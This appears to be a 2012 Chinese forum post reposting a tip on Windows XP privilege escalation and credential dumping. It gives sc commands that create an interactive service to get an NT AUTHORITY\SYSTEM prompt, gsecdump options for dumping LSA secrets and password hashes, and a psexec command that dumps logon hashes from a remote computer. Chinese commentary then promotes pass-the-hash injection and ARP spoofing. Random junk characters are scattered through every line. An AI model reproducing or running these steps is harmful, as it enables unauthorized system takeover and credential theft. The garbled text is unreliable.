o get a DOS Prompt as NT system:
- v8 G7 t6 a |: y! U* L; [( b) H1 w8 o; D
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact' H) ~3 y: W7 ^1 a! Y! S
[SC] CreateService SUCCESS3 p) o. I8 O. B" U% [2 ?# F
3 E/ l" }/ e, b8 C! ]
C:\>sc start shellcmdline
8 ], M' `0 n, g5 e[SC] StartService FAILED 1053:6 C# P- U+ `: K* N( g
9 q% k4 r% V6 a' E5 j, v- z
The service did not respond to the start or control request in a timely fashion.& j+ u: {4 ]& _, g/ d' C
( \# B4 ?' x) ?/ xC:\>sc delete shellcmdline5 q- l+ h7 O: I7 S6 r
[SC] DeleteService SUCCESS3 H; f" M* u, m( P. V6 |* C
! ^. O7 I; n) c0 N
------------2 }* B! H6 K+ ?# B7 v
: `% u; C# P2 Z
Then in the new DOS window:" Z ]1 B1 y0 z. g. Y3 n; K
7 T; P/ d3 ]4 k( X+ ~+ |Microsoft Windows XP [Version 5.1.2600]) K. D2 } |# h7 {' Y8 a8 P
(C) Copyright 1985-2001 Microsoft Corp.! f D' K5 Q) \8 F; U3 b2 [
& f c+ t1 F) s4 k/ d
C:\WINDOWS\system32>whoami
' n, @ D; G6 ?- J* \1 G8 Z' oNT AUTHORITY\SYSTEM S D7 Q0 D& p1 j1 l& ]; ?' ^6 J" r2 L
+ m; T1 h. S3 j8 V |# J9 ]* T
C:\WINDOWS\system32>gsecdump -h
4 @) @' M& s/ h) F" d' Y( `( K% Lgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
6 r, S1 L2 K# h, a* ?usage: gsecdump [options]+ C9 j0 f( J! X
" |7 T% r" l. t' u$ c% z& k
options:- O6 N- X: D" O/ W4 N! B5 D0 {0 E
-h [ --help ] show help U# } j- }& Z5 o' i9 ?* x
-a [ --dump_all ] dump all secrets
/ H& `- h+ [) B1 t-l [ --dump_lsa ] dump lsa secrets
2 A r) S [" P- \2 y6 C7 O6 a# P-w [ --dump_wireless ] dump microsoft wireless connections
: i! U$ ]) G/ k' I-u [ --dump_usedhashes ] dump hashes from active logon sessions
' l% V( k1 ?9 T: n$ I5 ]4 @% Q-s [ --dump_hashes ] dump hashes from SAM/AD4 y* f& K) A2 w* I) w
$ l# g/ L% ~% h' |7 Q" l* RAlthough I like to use:; Y0 {# f! R/ I. k H0 S- Y) t* t
. ^, D4 D1 w l7 I2 K4 `* [+ t4 U6 u
PsExec v1.83 - Execute processes remotely/ E( ?' c$ W$ n. e
Copyright (C) 2001-2007 Mark Russinovich
' [6 V4 C1 G$ Q' jSysinternals - 链接标记[url]www.sysinternals.com[/url]% b' W5 ~1 }. I( S
: m c. N7 n7 T, r
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT9 J& _2 _, B" W b0 `% e1 \
) z% q1 p8 I. L3 [; ~0 {% s' m' bto get the hashes from active logon sessions of a remote system.5 v* ]2 b; C, ]' E
( Y2 g- l) l+ W/ u5 n2 N
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
" J( }% X1 c, W0 Y/ M* ?4 Q4 \: N" ^1 R# E' B
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
" |- U% N' C8 B( H8 J4 y原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
; {3 v6 }4 V3 h% T( m6 Z
0 U! B& d/ D$ J7 W. k0 d. Q我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。+ V) s% U: Y/ l n+ q0 E
|
发表于 2012-11-6 21:09:29
收藏
支持
反对